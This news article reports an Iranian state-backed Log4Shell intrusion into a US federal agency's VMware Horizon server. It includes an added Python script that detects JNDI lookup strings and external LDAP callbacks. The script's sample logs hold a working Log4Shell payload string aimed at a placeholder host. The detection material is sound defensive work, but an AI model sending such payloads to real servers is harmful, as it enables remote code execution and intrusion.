In December last year, it was reported that Iranian and Chinese hackers were exploiting the Log4Shell vulnerability in the wild. Now, according to the US CISA (Cybersecurity and Infrastructure Security Agency), an advanced persistent threat (APT) group sponsored by the Iranian government compromised the network of a U.S. federal agency.
The attack, according to authorities, was launched on the Federal Civilian Executive Branch (FCEB).
CISA revealed that the hackers exploited the Log4Shell vulnerability, tracked as CVE-2021-44228, in an unpatched VMware Horizon server to compromise the network and gain control of the organization’s domain controller (DC). Once inside, the hackers deployed XMRig crypto mining software and harvested credentials.
For your information, Log4Shell is a zero-day vulnerability in a Java logging framework called Log4j that causes arbitrary code execution and impacts VMware Horizon and an extensive array of products.
As per CISA, its researchers conducted a routine investigation in April 2022 and, using the EINSTEIN intrusion detection system deployed at the agency, identified suspicious APT activity on the FCEB network.
They discovered bi-directional traffic between the network and a known malicious IP address that had already been linked to Log4Shell exploitation of VMware Horizon servers.
CISA further noted HTTPS traffic from the IP address 51.89.181.64 to the VMware server. Further probing revealed that the IP address was associated with a Lightweight Directory Access Protocol (LDAP) server operated by the attackers to deliver the Log4Shell payload.
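The two signals described above, a Log4j lookup string arriving in a web request and the server then reaching out to an attacker-controlled LDAP host, are exactly what a defender can hunt for in Horizon access logs and egress connection records. The following script is an added example, not code from the article or from CISA; it scans constructed sample log lines for the `${jndi:` lookup syntax and flags outbound connections from an assumed internal range (10.0.0.0/8) either to the IP address named above or to any external LDAP port. The sample log format, the connection-record format, the internal range, and the 203.0.113.7 address (a documentation-range placeholder) are all assumptions made for the example.

```python
import ipaddress
import re

# Indicator from the advisory as quoted in the article: the attacker-operated LDAP server.
KNOWN_BAD_IPS = {"51.89.181.64"}

# Assumed internal address space for the monitored network (constructed for this example).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Ports on which a JNDI callback would typically reach an attacker LDAP server.
LDAP_PORTS = {389, 636, 1389}

# The Log4j lookup syntax that triggers a JNDI fetch; case-insensitive and
# tolerant of stray whitespace around the token.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Simplified connection record: "src:port -> dst:port" (assumed format).
CONN_RE = re.compile(r"^(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<port>\d+)$")


def is_internal(ip: ipaddress.IPv4Address) -> bool:
    return any(ip in net for net in INTERNAL_NETS)


def scan_request_log(lines):
    """Flag request log lines carrying a Log4j JNDI lookup string anywhere in the line
    (the User-Agent is a common carrier, but any logged header or parameter counts)."""
    hits = []
    for n, line in enumerate(lines, 1):
        if JNDI_RE.search(line):
            hits.append({"line": n, "reason": "jndi-lookup", "text": line})
    return hits


def scan_connections(lines, bad_ips=KNOWN_BAD_IPS):
    """Flag outbound connections from internal hosts to a known-bad address, or to an
    LDAP port on any external host (an application server has no reason to do LDAP
    to the internet; that is the callback leg of a Log4Shell exploit)."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = CONN_RE.match(line.strip())
        if not m:
            continue  # skip records that do not parse rather than guess
        src = ipaddress.ip_address(m["src"])
        dst = ipaddress.ip_address(m["dst"])
        port = int(m["port"])
        if not is_internal(src) or is_internal(dst):
            continue  # only internal -> external traffic is of interest here
        if str(dst) in bad_ips:
            hits.append({"line": n, "reason": "known-bad-ip", "dst": str(dst), "port": port})
        elif port in LDAP_PORTS:
            hits.append({"line": n, "reason": "external-ldap", "dst": str(dst), "port": port})
    return hits


# Constructed sample data (not real captures).
SAMPLE_REQUESTS = [
    '10.0.0.5 - - [12/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Feb/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [12/Feb/2022:10:02:00 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "curl/7.79.1"',
]
SAMPLE_CONNECTIONS = [
    "10.0.0.20:51234 -> 10.0.0.2:389",       # internal directory lookup, benign
    "10.0.0.20:51240 -> 51.89.181.64:443",   # HTTPS to the address named in the article
    "10.0.0.20:51241 -> 203.0.113.7:1389",   # LDAP to an external host (placeholder address)
    "10.0.0.20:51242 -> 93.184.216.34:443",  # ordinary HTTPS egress, benign
]

if __name__ == "__main__":
    for hit in scan_request_log(SAMPLE_REQUESTS):
        print("request:", hit)
    for hit in scan_connections(SAMPLE_CONNECTIONS):
        print("connection:", hit)
```

The connection scan is deliberately independent of the request scan: the lookup string can arrive through any logged field, and some collectors truncate headers, so the outbound LDAP connection is often the more reliable of the two indicators.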
Who are the Attackers?
In a joint advisory from CISA, the Department of Homeland Security, and the FBI, it was revealed that the attack was launched in February 2022. The attackers moved laterally to the DC, stole credentials, and implanted Ngrok reverse proxies on multiple hosts to maintain persistence. U.S. security officials responded in June to clean up the network.
Reportedly, the hackers were identified as Nemesis Kitten, and they launched the attack with backing from the Iranian government. Nemesis Kitten is an offshoot of the Iranian Phosphorus group, and it regularly exploits well-known, easily exploitable vulnerabilities to facilitate ransomware attacks against organizations.
CISA warned that organizations still running unpatched versions of the server should be concerned, as they would eventually be compromised.